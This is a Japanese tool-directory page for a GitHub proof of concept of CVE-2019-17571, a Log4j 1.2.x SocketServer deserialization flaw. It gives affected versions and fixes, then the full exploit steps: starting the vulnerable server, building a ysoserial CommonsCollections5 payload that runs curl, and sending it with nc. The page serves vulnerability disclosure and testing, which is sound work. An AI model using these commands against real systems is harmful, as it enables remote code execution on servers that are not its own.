Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-17571 — Apache Log4j 1.2.Xには逆シリアル化によるリモートコード実行の脆弱性が存在します | Kitploit
ツール/GitHubGitHub/shadow-horse/cve-2019-17571
脆弱性分析コード分析エクスプロイトペネトレーションテストリモートアクセスツール
GitHubshadow-horse/cve-2019-17571

CVE-2019-17571

Apache Log4j 1.2.Xには逆シリアル化によるリモートコード実行の脆弱性が存在します

リポジトリを見る
7856年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2019-17571/Apache Log4j 1.2.X における逆シリアル化リモートコード実行脆弱性

脆弱性警告参考リンク: https://mp.weixin.qq.com/s/okU2y0izfnKXXtXG3EfLkQ

1. 脆弱性の説明

Apache Log4j は、米国 Apache ソフトウェア財団が開発した Java ベースのオープンソースログ記録ツールです。Apache Log4j 1.2.X シリーズには、逆シリアル化によるリモートコード実行の脆弱性が存在します。攻撃者はこの脆弱性を利用して任意の悪意あるコマンドを実行する可能性があります。Log4j 1.2.X には SocketServer クラスが含まれており、このクラスは信頼できないデータの逆シリアル化に対して脆弱です。ログデータをリッスンする信頼できないネットワークトラフィックを扱う際、逆シリアル化ガジェットと組み合わせることで、このクラスを利用してリモートから任意のコードを実行できます。影響範囲は現時点の最新バージョンも含みます。

2. 脆弱性の危険性

高リスク

影響範囲
1.2.4 <= Apache Log4j <= 1.2.17 (最新版)

修正推奨

  1. Apache Log4j 2 シリーズの最新バージョンにアップグレードする

  2. 当該クラスが使用するソケットポートをインターネットに公開しないようにする

3. 脆弱性の検証

Apache Log4j 2.8.1 の時代にも逆シリアル化リモートコード実行脆弱性 (CVE-2017-5645) が存在し、その際のトリガークラスは org.apache.logging.log4j.core.net.server.TcpSocketServer でした。Apache Log4j 1.2.X では脆弱性クラスが org.apache.log4j.net.SocketServer に変わりました。

1. 脆弱性環境の起動

調査の結果、log4j 1.X の SocketServer を起動する方法は Java コードではなく、java コマンドを使用することがわかりました(他の起動方法があればお知らせください)。

同様に、影響を受ける jar ファイルとコード実行可能な jar ファイルをダウンロードし、環境変数に設定する必要があります(以下は Windows 環境です)。サービスを起動し、3つのパラメータ(ポート番号、log4j 設定ファイル、lcf ディレクトリ)を渡します。

root@kitploit:~
java -cp log4j-1.2.17.jar;c3p0-0.9.5.2.jar;mchange-commons-java-0.2.11.jar;commons-collections-3.1.jar org.apache.log4j.net.SocketServer 4560 log4jserver.properties ./  

java -cp log4j-1.2.17.jar:../commons-collections/commons-collections-3.1.jar org.apache.log4j.net.SocketServer 4560 config/log4jserver.properties ./  

2. log4j2 の RCE POC を利用

root@kitploit:~
java -jar ysoserial-master.jar CommonsCollections5 "curl http://127.0.0.1/ssrf/ssrf.php?rand=log4j" > log4j.curl.bin  

3. nc で悪意あるソケットを送信

root@kitploit:~
nc 127.0.0.1 4560 < log4j.curl.bin  

関連 jar ファイル取得先:https://github.com/shadow-horse/Vulenvironment/libs

ツールをダウンロード